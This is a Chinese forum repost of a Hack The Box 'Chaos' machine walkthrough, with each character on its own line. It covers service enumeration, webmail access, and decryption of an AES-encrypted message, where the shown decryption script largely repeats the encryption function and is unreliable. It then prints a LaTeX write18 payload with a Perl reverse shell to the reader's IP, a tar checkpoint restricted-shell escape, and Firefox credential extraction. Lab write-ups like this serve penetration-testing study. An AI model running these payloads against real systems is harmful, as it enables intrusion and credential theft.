论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[26842] 2019-07-30_【HTB系列】靶机Chaos的渗透测试详解
文档创建者:
s7ckTeam
浏览次数:
1
最后更新:
2025-01-19
渗透测试
1 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2019-07-30_【HTB系列】靶机Chaos的渗透测试详解
【
H
T
B
系
列
】
靶
机
C
h
a
o
s
的
渗
透
测
试
详
解
原
创
徐
哥
M
s
0
8
0
6
7
安
全
实
验
室
2
0
1
9
-
0
7
-
3
0
收
录
于
话
题
#
靶
场
系
列
文
章
,
2
3
个
本
文
作
者
:
是
大
方
子
(
M
s
0
8
0
6
7
实
验
室
核
心
成
员
)
知
识
点
:
知
识
点
:
1
.
通
过
域
名
或
者
I
P
可
能
会
得
到
网
站
的
不
同
响
应
2
.
W
p
s
c
a
n
的
扫
描
w
o
r
d
p
r
e
s
s
3
.
修
改
h
o
s
t
s
来
对
网
页
邮
件
系
统
w
e
b
m
a
i
l
进
行
访
问
4
.
L
a
T
a
x
反
弹
s
h
e
l
l
5
.
通
过
t
a
r
来
进
行
限
制
s
h
e
l
l
的
绕
过
并
修
复
s
h
e
l
l
的
P
A
T
H
6
.
用
f
i
r
e
f
o
x
_
d
e
c
r
y
p
t
提
取
火
狐
的
用
户
凭
证
缓
存
介
绍
介
绍
K
a
l
i
:
1
0
.
1
0
.
1
2
.
8
7
靶
机
地
址
:
1
0
.
1
0
.
1
0
.
1
2
0
先
用
N
m
a
p
来
进
行
探
测
r
o
o
t
@
k
a
l
i
:
~
/
H
T
B
#
n
m
a
p
-
s
V
-
T
5
-
s
C
1
0
.
1
0
.
1
0
.
1
2
0
S
t
a
r
t
i
n
g
N
m
a
p
7
.
7
0
(
h
t
t
p
s
:
/
/
n
m
a
p
.
o
r
g
)
a
t
2
0
1
9
-
0
6
-
0
8
1
3
:
1
8
C
S
T
N
m
a
p
s
c
a
n
r
e
p
o
r
t
f
o
r
1
0
.
1
0
.
1
0
.
1
2
0
H
o
s
t
i
s
u
p
(
0
.
2
1
s
l
a
t
e
n
c
y
)
.
N
o
t
s
h
o
w
n
:
9
9
4
c
l
o
s
e
d
p
o
r
t
s
P
O
R
T
S
T
A
T
E
S
E
R
V
I
C
E
V
E
R
S
I
O
N
8
0
/
t
c
p
o
p
e
n
h
t
t
p
A
p
a
c
h
e
h
t
t
p
d
2
.
4
.
3
4
(
(
U
b
u
n
t
u
)
)
|
_
h
t
t
p
-
s
e
r
v
e
r
-
h
e
a
d
e
r
:
A
p
a
c
h
e
/
2
.
4
.
3
4
(
U
b
u
n
t
u
)
|
_
h
t
t
p
-
t
i
t
l
e
:
S
i
t
e
d
o
e
s
n
'
t
h
a
v
e
a
t
i
t
l
e
(
t
e
x
t
/
h
t
m
l
)
.
1
1
0
/
t
c
p
o
p
e
n
p
o
p
3
D
o
v
e
c
o
t
p
o
p
3
d
|
_
p
o
p
3
-
c
a
p
a
b
i
l
i
t
i
e
s
:
S
T
L
S
U
I
D
L
T
O
P
S
A
S
L
R
E
S
P
-
C
O
D
E
S
C
A
P
A
A
U
T
H
-
R
E
S
P
-
C
O
D
E
P
I
P
E
L
I
N
I
N
G
|
s
s
l
-
c
e
r
t
:
S
u
b
j
e
c
t
:
c
o
m
m
o
n
N
a
m
e
=
c
h
a
o
s
|
S
u
b
j
e
c
t
A
l
t
e
r
n
a
t
i
v
e
N
a
m
e
:
D
N
S
:
c
h
a
o
s
|
N
o
t
v
a
l
i
d
b
e
f
o
r
e
:
2
0
1
8
-
1
0
-
2
8
T
1
0
:
0
1
:
4
9
|
_
N
o
t
v
a
l
i
d
a
f
t
e
r
:
2
0
2
8
-
1
0
-
2
5
T
1
0
:
0
1
:
4
9
|
_
s
s
l
-
d
a
t
e
:
T
L
S
r
a
n
d
o
m
n
e
s
s
d
o
e
s
n
o
t
r
e
p
r
e
s
e
n
t
t
i
m
e
1
4
3
/
t
c
p
o
p
e
n
i
m
a
p
D
o
v
e
c
o
t
i
m
a
p
d
(
U
b
u
n
t
u
)
|
_
i
m
a
p
-
c
a
p
a
b
i
l
i
t
i
e
s
:
S
T
A
R
T
T
L
S
E
N
A
B
L
E
L
I
T
E
R
A
L
+
O
K
I
M
A
P
4
r
e
v
1
S
A
S
L
-
I
R
L
O
G
I
N
D
I
S
A
B
L
E
D
A
0
0
0
1
h
a
v
e
p
o
s
t
-
l
o
g
i
n
l
i
s
t
e
d
I
D
I
D
L
E
L
O
G
I
N
-
R
E
F
E
R
R
A
L
S
c
a
p
a
b
i
l
i
t
i
e
s
m
o
r
e
P
r
e
-
l
o
g
i
n
|
s
s
l
-
c
e
r
t
:
S
u
b
j
e
c
t
:
c
o
m
m
o
n
N
a
m
e
=
c
h
a
o
s
|
S
u
b
j
e
c
t
A
l
t
e
r
n
a
t
i
v
e
N
a
m
e
:
D
N
S
:
c
h
a
o
s
|
N
o
t
v
a
l
i
d
b
e
f
o
r
e
:
2
0
1
8
-
1
0
-
2
8
T
1
0
:
0
1
:
4
9
|
_
N
o
t
v
a
l
i
d
a
f
t
e
r
:
2
0
2
8
-
1
0
-
2
5
T
1
0
:
0
1
:
4
9
|
_
s
s
l
-
d
a
t
e
:
T
L
S
r
a
n
d
o
m
n
e
s
s
d
o
e
s
n
o
t
r
e
p
r
e
s
e
n
t
t
i
m
e
9
9
3
/
t
c
p
o
p
e
n
s
s
l
/
i
m
a
p
D
o
v
e
c
o
t
i
m
a
p
d
(
U
b
u
n
t
u
)
|
_
i
m
a
p
-
c
a
p
a
b
i
l
i
t
i
e
s
:
E
N
A
B
L
E
L
I
T
E
R
A
L
+
O
K
A
U
T
H
=
P
L
A
I
N
A
0
0
0
1
S
A
S
L
-
I
R
c
a
p
a
b
i
l
i
t
i
e
s
h
a
v
e
p
o
s
t
-
l
o
g
i
n
l
i
s
t
e
d
I
D
I
D
L
E
L
O
G
I
N
-
R
E
F
E
R
R
A
L
S
I
M
A
P
4
r
e
v
1
m
o
r
e
P
r
e
-
l
o
g
i
n
|
s
s
l
-
c
e
r
t
:
S
u
b
j
e
c
t
:
c
o
m
m
o
n
N
a
m
e
=
c
h
a
o
s
|
S
u
b
j
e
c
t
A
l
t
e
r
n
a
t
i
v
e
N
a
m
e
:
D
N
S
:
c
h
a
o
s
|
N
o
t
v
a
l
i
d
b
e
f
o
r
e
:
2
0
1
8
-
1
0
-
2
8
T
1
0
:
0
1
:
4
9
|
_
N
o
t
v
a
l
i
d
a
f
t
e
r
:
2
0
2
8
-
1
0
-
2
5
T
1
0
:
0
1
:
4
9
|
_
s
s
l
-
d
a
t
e
:
T
L
S
r
a
n
d
o
m
n
e
s
s
d
o
e
s
n
o
t
r
e
p
r
e
s
e
n
t
t
i
m
e
9
9
5
/
t
c
p
o
p
e
n
s
s
l
/
p
o
p
3
D
o
v
e
c
o
t
p
o
p
3
d
|
_
p
o
p
3
-
c
a
p
a
b
i
l
i
t
i
e
s
:
A
U
T
H
-
R
E
S
P
-
C
O
D
E
U
I
D
L
T
O
P
S
A
S
L
(
P
L
A
I
N
)
R
E
S
P
-
C
O
D
E
S
C
A
P
A
U
S
E
R
P
I
P
E
L
I
N
I
N
G
|
s
s
l
-
c
e
r
t
:
S
u
b
j
e
c
t
:
c
o
m
m
o
n
N
a
m
e
=
c
h
a
o
s
|
S
u
b
j
e
c
t
A
l
t
e
r
n
a
t
i
v
e
N
a
m
e
:
D
N
S
:
c
h
a
o
s
|
N
o
t
v
a
l
i
d
b
e
f
o
r
e
:
2
0
1
8
-
1
0
-
2
8
T
1
0
:
0
1
:
4
9
|
_
N
o
t
v
a
l
i
d
a
f
t
e
r
:
2
0
2
8
-
1
0
-
2
5
T
1
0
:
0
1
:
4
9
|
_
s
s
l
-
d
a
t
e
:
T
L
S
r
a
n
d
o
m
n
e
s
s
d
o
e
s
n
o
t
r
e
p
r
e
s
e
n
t
t
i
m
e
1
0
0
0
0
/
t
c
p
o
p
e
n
h
t
t
p
M
i
n
i
S
e
r
v
1
.
8
9
0
(
W
e
b
m
i
n
h
t
t
p
d
)
|
_
h
t
t
p
-
t
i
t
l
e
:
S
i
t
e
d
o
e
s
n
'
t
h
a
v
e
a
t
i
t
l
e
(
t
e
x
t
/
h
t
m
l
;
C
h
a
r
s
e
t
=
i
s
o
-
8
8
5
9
-
1
)
.
S
e
r
v
i
c
e
I
n
f
o
:
O
S
:
L
i
n
u
x
;
C
P
E
:
c
p
e
:
/
o
:
l
i
n
u
x
:
l
i
n
u
x
_
k
e
r
n
e
l
S
e
r
v
i
c
e
d
e
t
e
c
t
i
o
n
p
e
r
f
o
r
m
e
d
.
P
l
e
a
s
e
r
e
p
o
r
t
a
n
y
i
n
c
o
r
r
e
c
t
r
e
s
u
l
t
s
a
t
h
t
t
p
s
:
/
/
n
m
a
p
.
o
r
g
/
s
u
b
m
i
t
/
.
N
m
a
p
d
o
n
e
:
1
I
P
a
d
d
r
e
s
s
(
1
h
o
s
t
u
p
)
s
c
a
n
n
e
d
i
n
5
8
.
6
3
s
e
c
o
n
d
s
靶
机
上
运
行
这
h
t
t
p
服
,
p
o
p
3
i
m
a
p
以
及
它
们
对
应
的
s
s
l
加
密
后
的
服
务
,
还
有
一
个
就
是
监
听
在
1
0
0
0
的
M
i
n
i
S
e
r
v
我
们
看
下
8
0
端
口
8
0
端
口
:
发
现
靶
机
是
不
允
许
直
接
使
用
I
P
进
行
访
问
的
,
那
么
我
们
修
改
下
/
e
t
c
/
h
o
s
t
s
文
件
再
次
访
问
这
里
我
们
用
g
o
b
u
s
t
e
r
爆
破
下
目
录
,
为
了
结
果
的
准
确
我
把
I
P
类
型
的
地
址
和
域
名
类
型
的
地
址
都
扫
描
了
一
遍
出
现
的
结
果
不
同
,
但
是
都
是
一
个
问
题
就
是
网
站
目
录
可
直
接
访
问
,
在
I
P
的
扫
描
结
果
中
我
们
发
现
了
w
p
(
w
o
r
d
p
r
e
s
s
)
,
这
里
我
们
只
能
用
I
P
去
访
问
用
域
名
去
访
问
是
没
有
的
那
么
我
们
就
用
w
p
s
c
a
n
去
扫
描
下
,
这
里
用
t
e
e
命
令
在
输
出
结
果
到
终
端
的
同
时
也
把
结
果
输
出
到
文
件
中
去
。
这
里
扫
描
出
了
2
条
有
用
的
信
息
,
这
里
有
个
用
户
名
字
叫
h
u
m
a
n
我
们
尝
试
把
h
u
m
a
n
当
成
密
码
输
入
到
刚
刚
页
面
那
篇
的
加
密
文
章
,
发
现
是
正
确
的
并
且
我
们
得
到
了
w
e
b
m
a
i
l
的
帐
户
和
密
码
C
r
e
d
s
f
o
r
w
e
b
m
a
i
l
:
u
s
e
r
n
a
m
e
–
a
y
u
s
h
p
a
s
s
w
o
r
d
–
j
i
u
j
i
t
s
u
我
们
是
有
看
到
靶
机
是
运
行
这
邮
件
系
统
的
,
我
们
用
这
个
尝
试
去
登
陆
,
我
们
再
再
h
o
s
t
s
中
增
加
w
e
b
m
a
i
.
c
h
a
o
s
.
h
t
b
的
记
录
然
后
输
入
w
e
b
m
a
i
l
.
c
h
a
o
s
.
h
t
b
进
行
登
陆
然
后
我
们
在
草
稿
箱
中
发
现
了
这
个
一
个
是
加
密
后
的
信
息
,
一
个
是
加
密
的
脚
本
文
件
,
邮
件
也
说
了
“
你
就
是
密
码
”
,
所
以
我
们
可
以
先
拿
s
a
h
a
y
当
作
密
码
进
行
尝
试
破
解
以
下
是
加
密
的
脚
本
文
件
d
e
f
e
n
c
r
y
p
t
(
k
e
y
,
f
i
l
e
n
a
m
e
)
:
c
h
u
n
k
s
i
z
e
=
6
4
*
1
0
2
4
o
u
t
p
u
t
F
i
l
e
=
"
e
n
"
+
f
i
l
e
n
a
m
e
f
i
l
e
s
i
z
e
=
s
t
r
(
o
s
.
p
a
t
h
.
g
e
t
s
i
z
e
(
f
i
l
e
n
a
m
e
)
)
.
z
f
i
l
l
(
1
6
)
I
V
=
R
a
n
d
o
m
.
n
e
w
(
)
.
r
e
a
d
(
1
6
)
e
n
c
r
y
p
t
o
r
=
A
E
S
.
n
e
w
(
k
e
y
,
A
E
S
.
M
O
D
E
_
C
B
C
,
I
V
)
w
i
t
h
o
p
e
n
(
f
i
l
e
n
a
m
e
,
'
r
b
'
)
a
s
i
n
f
i
l
e
:
w
i
t
h
o
p
e
n
(
o
u
t
p
u
t
F
i
l
e
,
'
w
b
'
)
a
s
o
u
t
f
i
l
e
:
o
u
t
f
i
l
e
.
w
r
i
t
e
(
f
i
l
e
s
i
z
e
.
e
n
c
o
d
e
(
'
u
t
f
-
8
'
)
)
o
u
t
f
i
l
e
.
w
r
i
t
e
(
I
V
)
w
h
i
l
e
T
r
u
e
:
c
h
u
n
k
=
i
n
f
i
l
e
.
r
e
a
d
(
c
h
u
n
k
s
i
z
e
)
i
f
l
e
n
(
c
h
u
n
k
)
=
=
0
:
b
r
e
a
k
e
l
i
f
l
e
n
(
c
h
u
n
k
)
%
1
6
!
=
0
:
c
h
u
n
k
+
=
b
'
'
*
(
1
6
-
(
l
e
n
(
c
h
u
n
k
)
%
1
6
)
)
o
u
t
f
i
l
e
.
w
r
i
t
e
(
e
n
c
r
y
p
t
o
r
.
e
n
c
r
y
p
t
(
c
h
u
n
k
)
)
d
e
f
g
e
t
K
e
y
(
p
a
s
s
w
o
r
d
)
:
h
a
s
h
e
r
=
S
H
A
2
5
6
.
n
e
w
(
p
a
s
s
w
o
r
d
.
e
n
c
o
d
e
(
'
u
t
f
-
8
'
)
)
r
e
t
u
r
n
h
a
s
h
e
r
.
d
i
g
e
s
t
(
)
根
据
加
密
脚
本
写
出
对
应
的
解
密
脚
本
f
r
o
m
C
r
y
p
t
o
.
H
a
s
h
i
m
p
o
r
t
S
H
A
2
5
6
f
r
o
m
C
r
y
p
t
o
.
C
i
p
h
e
r
i
m
p
o
r
t
A
E
S
i
m
p
o
r
t
C
r
y
p
t
o
.
C
i
p
h
e
r
.
A
E
S
f
r
o
m
b
i
n
a
s
c
i
i
i
m
p
o
r
t
h
e
x
l
i
f
y
,
u
n
h
e
x
l
i
f
y
d
e
f
e
n
c
r
y
p
t
(
k
e
y
,
f
i
l
e
n
a
m
e
)
:
c
h
u
n
k
s
i
z
e
=
6
4
*
1
0
2
4
o
u
t
p
u
t
F
i
l
e
=
"
e
n
"
+
f
i
l
e
n
a
m
e
f
i
l
e
s
i
z
e
=
s
t
r
(
o
s
.
p
a
t
h
.
g
e
t
s
i
z
e
(
f
i
l
e
n
a
m
e
)
)
.
z
f
i
l
l
(
1
6
)
I
V
=
R
a
n
d
o
m
.
n
e
w
(
)
.
r
e
a
d
(
1
6
)
e
n
c
r
y
p
t
o
r
=
A
E
S
.
n
e
w
(
k
e
y
,
A
E
S
.
M
O
D
E
_
C
B
C
,
I
V
)
w
i
t
h
o
p
e
n
(
f
i
l
e
n
a
m
e
,
'
r
b
'
)
a
s
i
n
f
i
l
e
:
w
i
t
h
o
p
e
n
(
o
u
t
p
u
t
F
i
l
e
,
'
w
b
'
)
a
s
o
u
t
f
i
l
e
:
o
u
t
f
i
l
e
.
w
r
i
t
e
(
f
i
l
e
s
i
z
e
.
e
n
c
o
d
e
(
'
u
t
f
-
8
'
)
)
o
u
t
f
i
l
e
.
w
r
i
t
e
(
I
V
)
w
h
i
l
e
T
r
u
e
:
c
h
u
n
k
=
i
n
f
i
l
e
.
r
e
a
d
(
c
h
u
n
k
s
i
z
e
)
i
f
l
e
n
(
c
h
u
n
k
)
=
=
0
:
b
r
e
a
k
e
l
i
f
l
e
n
(
c
h
u
n
k
)
%
1
6
!
=
0
:
c
h
u
n
k
+
=
b
'
'
*
(
1
6
-
(
l
e
n
(
c
h
u
n
k
)
%
1
6
)
)
o
u
t
f
i
l
e
.
w
r
i
t
e
(
e
n
c
r
y
p
t
o
r
.
e
n
c
r
y
p
t
(
c
h
u
n
k
)
)
d
e
f
g
e
t
K
e
y
(
p
a
s
s
w
o
r
d
)
:
h
a
s
h
e
r
=
S
H
A
2
5
6
.
n
e
w
(
p
a
s
s
w
o
r
d
.
e
n
c
o
d
e
(
'
u
t
f
-
8
'
)
)
r
e
t
u
r
n
h
a
s
h
e
r
.
d
i
g
e
s
t
(
)
i
f
_
_
n
a
m
e
_
_
=
=
"
_
_
m
a
i
n
_
_
"
:
c
h
u
n
k
s
i
z
e
=
6
4
*
1
0
2
4
m
k
e
y
=
g
e
t
K
e
y
(
"
s
a
h
a
y
"
)
m
I
V
=
(
b
"
0
0
0
0
0
0
0
0
0
0
0
0
0
2
3
4
"
)
d
e
c
i
p
h
e
r
=
A
E
S
.
n
e
w
(
m
k
e
y
,
A
E
S
.
M
O
D
E
_
C
B
C
,
m
I
V
)
w
i
t
h
o
p
e
n
(
"
e
n
i
m
_
m
s
g
.
t
x
t
"
,
'
r
b
'
)
a
s
i
n
f
i
l
e
:
c
h
u
n
k
=
i
n
f
i
l
e
.
r
e
a
d
(
c
h
u
n
k
s
i
z
e
)
p
l
a
i
n
t
e
x
t
=
d
e
c
i
p
h
e
r
.
d
e
c
r
y
p
t
(
c
h
u
n
k
)
p
r
i
n
t
p
l
a
i
n
t
e
x
t
执
行
解
密
脚
本
得
到
B
a
s
e
6
4
加
密
后
的
结
果
:
这
里
前
面
的
1
6
为
I
V
向
量
要
去
除
,
然
后
通
过
b
a
s
e
6
4
解
码
e
c
h
o
"
S
G
l
p
I
F
N
h
a
G
F
5
C
g
p
Q
b
G
V
h
c
2
U
g
Y
2
h
l
Y
2
s
g
b
3
V
y
I
G
5
l
d
y
B
z
Z
X
J
2
a
W
N
l
I
H
d
o
a
W
N
o
I
G
N
y
Z
W
F
0
Z
S
B
w
Z
G
Y
K
C
n
A
u
c
y
A
t
I
E
F
z
I
H
l
v
d
S
B
0
b
2
x
k
I
G
1
l
I
H
R
v
I
G
V
u
Y
3
J
5
c
H
Q
g
a
W
1
w
b
3
J
0
Y
W
5
0
I
G
1
z
Z
y
w
g
a
S
B
k
a
W
Q
g
O
i
k
K
C
m
h
0
d
H
A
6
L
y
9
j
a
G
F
v
c
y
5
o
d
G
I
v
S
j
A
w
X
3
c
x
b
G
x
f
Z
j
F
O
Z
F
9
u
M
D
d
I
M
W
4
5
X
0
g
z
c
j
M
K
C
l
R
o
Y
W
5
r
c
y
w
K
Q
X
l
1
c
2
g
K
"
|
b
a
s
e
6
4
-
d
得
到
一
个
连
接
h
t
t
p
:
/
/
c
h
a
o
s
.
h
t
b
/
J
0
0
_
w
1
l
l
_
f
1
N
d
_
n
0
7
H
1
n
9
_
H
3
r
3
L
a
T
a
x
常
用
于
文
档
排
版
的
,
具
体
可
以
百
度
下
!
输
入
文
本
并
选
择
好
模
板
后
可
以
生
成
P
D
F
,
可
以
在
h
t
t
p
:
/
/
c
h
a
o
s
.
h
t
b
/
J
0
0
_
w
1
l
l
_
f
1
N
d
_
n
0
7
H
1
n
9
_
H
3
r
3
/
p
d
f
/
看
到
生
成
好
的
P
D
F
!
关
于
L
a
T
a
x
的
攻
击
可
以
参
考
这
篇
文
章
:
h
t
t
p
s
:
/
/
0
d
a
y
.
w
o
r
k
/
h
a
c
k
i
n
g
-
w
i
t
h
-
l
a
t
e
x
/
我
们
使
用
下
面
的
e
x
p
反
弹
s
h
e
l
l
i
m
m
e
d
i
a
t
e
w
r
i
t
e
1
8
{
p
e
r
l
-
e
'
u
s
e
S
o
c
k
e
t
;
$
i
=
"
你
的
I
P
地
址
"
;
$
p
=
端
口
;
s
o
c
k
e
t
(
S
,
P
F
_
I
N
E
T
,
S
O
C
K
_
S
T
R
E
A
M
,
g
e
t
p
r
o
t
o
b
y
n
a
m
e
(
"
t
c
p
"
)
)
;
i
f
(
c
o
n
n
e
c
t
(
S
,
s
o
c
k
a
d
d
r
_
i
n
(
$
p
,
i
n
e
t
_
a
t
o
n
(
$
i
)
)
)
)
{
o
p
e
n
(
S
T
D
I
N
,
"
>
&
S
"
)
;
o
p
e
n
(
S
T
D
O
U
T
,
"
>
&
S
"
)
;
o
p
e
n
(
S
T
D
E
R
R
,
"
>
&
S
"
)
;
e
x
e
c
(
"
/
b
i
n
/
s
h
-
i
"
)
;
}
;
'
}
监
听
制
定
端
口
并
执
行
E
X
P
在
得
到
s
h
e
l
l
后
,
我
们
用
p
y
t
h
o
n
建
立
一
个
稳
定
的
s
h
e
l
l
切
换
到
H
o
m
e
目
录
发
现
这
2
个
目
录
都
没
有
权
限
我
们
试
下
之
前
的
m
a
i
l
的
帐
户
密
码
,
看
看
能
不
能
切
换
到
a
y
u
s
h
u
s
e
r
n
a
m
e
–
a
y
u
s
h
p
a
s
s
w
o
r
d
–
j
i
u
j
i
t
s
u
切
换
成
功
但
是
,
a
y
u
s
h
处
于
受
限
的
s
h
e
l
l
中
这
里
我
们
看
到
我
们
的
P
A
T
H
是
a
y
u
s
h
/
.
a
p
p
,
我
们
只
能
用
这
3
个
命
令
对
于
限
制
s
h
e
l
l
的
绕
过
,
可
以
参
考
这
个
:
h
t
t
p
s
:
/
/
w
w
w
.
e
x
p
l
o
i
t
-
d
b
.
c
o
m
/
d
o
c
s
/
e
n
g
l
i
s
h
/
4
4
5
9
2
-
l
i
n
u
x
-
r
e
s
t
r
i
c
t
e
d
-
s
h
e
l
l
-
b
y
p
a
s
s
-
g
u
i
d
e
.
p
d
f
那
么
我
们
用
t
a
r
进
行
绕
过
!
这
里
我
们
先
切
换
回
w
w
w
-
d
a
t
a
,
因
为
w
w
w
-
d
a
t
a
的
s
h
e
l
l
是
正
常
的
,
然
我
们
切
换
到
/
t
m
p
目
录
下
并
创
建
r
i
c
k
并
进
行
压
缩
然
后
在
切
换
到
a
y
u
s
h
然
后
先
进
行
绕
过
!
t
a
r
c
f
/
d
e
v
/
n
u
l
l
r
i
c
k
.
t
a
r
-
-
c
h
e
c
k
p
o
i
n
t
=
1
-
-
c
h
e
c
k
p
o
i
n
t
-
a
c
t
i
o
n
=
e
x
e
c
=
/
b
i
n
/
b
a
s
h
再
修
复
下
P
A
T
H
e
x
p
o
r
t
P
A
T
H
=
$
P
A
T
H
:
/
u
s
r
/
l
o
c
a
l
/
s
b
i
n
:
/
u
s
r
/
l
o
c
a
l
/
b
i
n
:
/
u
s
r
/
s
b
i
n
:
/
u
s
r
/
b
i
n
:
/
s
b
i
n
:
/
b
i
n
然
后
得
到
u
s
e
r
f
l
a
g
然
后
我
们
发
现
用
户
的
目
录
下
又
.
m
o
z
i
l
l
a
的
文
件
里
面
有
个
f
i
r
e
f
o
x
,
用
l
s
-
l
a
查
看
大
小
发
现
都
大
于
f
i
r
e
f
o
x
的
默
认
大
小
,
怀
疑
里
面
是
有
用
户
的
凭
证
的
使
用
f
i
r
e
f
o
x
_
d
e
c
r
y
p
t
提
取
缓
存
凭
据
,
项
目
地
址
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
u
n
o
d
e
/
f
i
r
e
f
o
x
_
d
e
c
r
y
p
t
然
后
把
项
目
下
载
到
靶
机
中
去
!
然
后
对
提
取
脚
本
加
执
行
权
限
,
并
进
行
解
密
,
提
示
需
要
输
入
主
密
钥
我
们
同
样
输
入
j
i
u
j
i
t
s
u
,
发
现
密
码
也
是
正
确
的
!
切
换
到
r
o
o
t
得
到
r
o
o
t
f
l
a
g
!
!
来
源
:
M
s
0
8
0
6
7
安
全
实
验
室
m
s
0
8
0
6
7
安
全
实
验
室
界
世
的
你
当
作
你
的
肩
膀
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试